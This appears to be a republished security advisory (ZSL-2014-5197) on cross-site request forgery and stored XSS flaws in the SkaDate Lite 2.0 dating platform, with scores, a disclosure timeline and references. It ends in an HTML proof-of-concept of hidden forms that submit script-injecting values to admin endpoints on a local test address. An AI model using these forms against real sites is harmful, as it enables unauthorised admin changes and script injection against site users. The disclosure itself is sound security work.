SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities

2014-07-3000:00:00

Gjoko Krstic

zeroscience.mk

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.1

Confidence

High

EPSS

0.012

Percentile

85.5%

JSON

Title: SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities
Advisory ID: ZSL-2014-5197
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 30.07.2014

Summary

SkaDate Lite is a new platform that makes it easy to start online dating business in just a few easy steps. No programming or design knowledge is required. Install the solution, pick a template, and start driving traffic to your new online dating site.

Description

SkaDate Lite version 2.0 suffers from multiple cross-site request forgery and stored xss vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Skalfa LLC - <http://lite.skadate.com>

Affected Version

2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]

Tested On

CentOS Linux 6.5 (Final)
nginx/1.6.0
PHP/5.3.28
MySQL 5.5.37

Vendor Status

[23.07.2014] Vulnerability discovered.
[28.07.2014] Vendor contacted.
[28.07.2014] Vendor responds asking more details.
[28.07.2014] Sent details to the vendor.
[29.07.2014] Vendor will fix the issues in the next release.
[30.07.2014] Public security advisory released.

PoC

skadatelite_csrfxss.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5195.php>
[2] <http://www.exploit-db.com/exploits/34204/>
[3] <http://osvdb.org/show/osvdb/109691>
[4] <http://osvdb.org/show/osvdb/109692>
[5] <http://osvdb.org/show/osvdb/109693>
[6] <http://osvdb.org/show/osvdb/109694>
[7] <http://cxsecurity.com/issue/WLB-2014070183>
[8] <http://packetstormsecurity.com/files/127690>
[9] <http://www.securityfocus.com/bid/68971>
[10] <http://xforce.iss.net/xforce/xfdb/95012>
[11] <http://xforce.iss.net/xforce/xfdb/95011>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9101>
[13] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9101>

Changelog

[30.07.2014] - Initial release
[05.10.2014] - Added reference [3], [4], [5], [6], [7], [8], [9], [10] and [11]
[02.12.2014] - Added reference [12] and [13]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities


Vendor: Skalfa LLC
Product web page: http://lite.skadate.com | http://www.skalfa.com
Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]

Summary: SkaDate Lite is a new platform that makes it easy
to start online dating business in just a few easy steps. No
programming or design knowledge is required. Install the solution,
pick a template, and start driving traffic to your new online
dating site.

Desc: SkaDate Lite version 2.0 suffers from multiple cross-site
request forgery and stored xss vulnerabilities. The application
allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Input passed to several POST parameters is not properly
sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: CentOS Linux 6.5 (Final)
           nginx/1.6.0
           PHP/5.3.28
           MySQL 5.5.37


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2014-5197
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5197.php



23.07.2014

--><html>
<head><title>SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities</title>
</head><body>
<form action="http://192.168.0.105/admin/users/roles/" method="POST">
<input name="form_name" type="hidden" value="add-role"/>
<input name="label" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="Execute #1"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6"/>
<input name="command" type="hidden" value="AddAccountType"/>
<input name="key" type="hidden" value="questions_account_type_5615100a931845eca8da20cfdf7327e0"/>
<input name="prefix" type="hidden" value="base"/>
<input name="accountTypeName" type="hidden" value="5615100a931845eca8da20cfdf7327e0"/>
<input name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="role" type="hidden" value="12"/>
<input type="submit" value="Execute #2"/>
</form>
<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input name="form_name" type="hidden" value="qst_add_form"/>
<input name="qst_name" type="hidden" value='"&gt;&lt;script&gt;alert(3);&lt;/script&gt;'/>
<input name="qst_description" type="hidden" value="ZSL"/>
<input name="qst_account_type[0]" type="hidden" value="290365aadde35a97f11207ca7e4279cc"/>
<input name="qst_section" type="hidden" value="f90cde5913235d172603cc4e7b9726e3"/>
<input name="qst_answer_type" type="hidden" value="text"/>
<input name="qst_possible_values" type="hidden" value="%5B%5D"/>
<input name="year_range[to]" type="hidden" value="1996"/>
<input name="year_range[from]" type="hidden" value="1930"/>
<input name="qst_column_count" type="hidden" value="1"/>
<input name="qst_required" type="hidden" value=""/>
<input name="qst_on_sign_up" type="hidden" value=""/>
<input name="qst_on_edit" type="hidden" value=""/>
<input name="qst_on_view" type="hidden" value=""/>
<input name="qst_on_search" type="hidden" value=""/>
<input name="valuesStorage" type="hidden" value="%7B%7D"/>
<input name="command" type="hidden" value="addQuestion"/>
<input type="submit" value="Execute #3"/>
</form>
<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
<input name="form_name" type="hidden" value='restrictedUsernamesForm"&gt;&lt;script&gt;alert(4);&lt;/script&gt;'/>
<input name="restrictedUsername" type="hidden" value='"&gt;&lt;script&gt;alert(5);&lt;/script&gt;'/>
<input name="addUsername" type="hidden" value="Add"/>
<input type="submit" value="Execute #4 &amp; #5"/>
</form>
</body>
</html>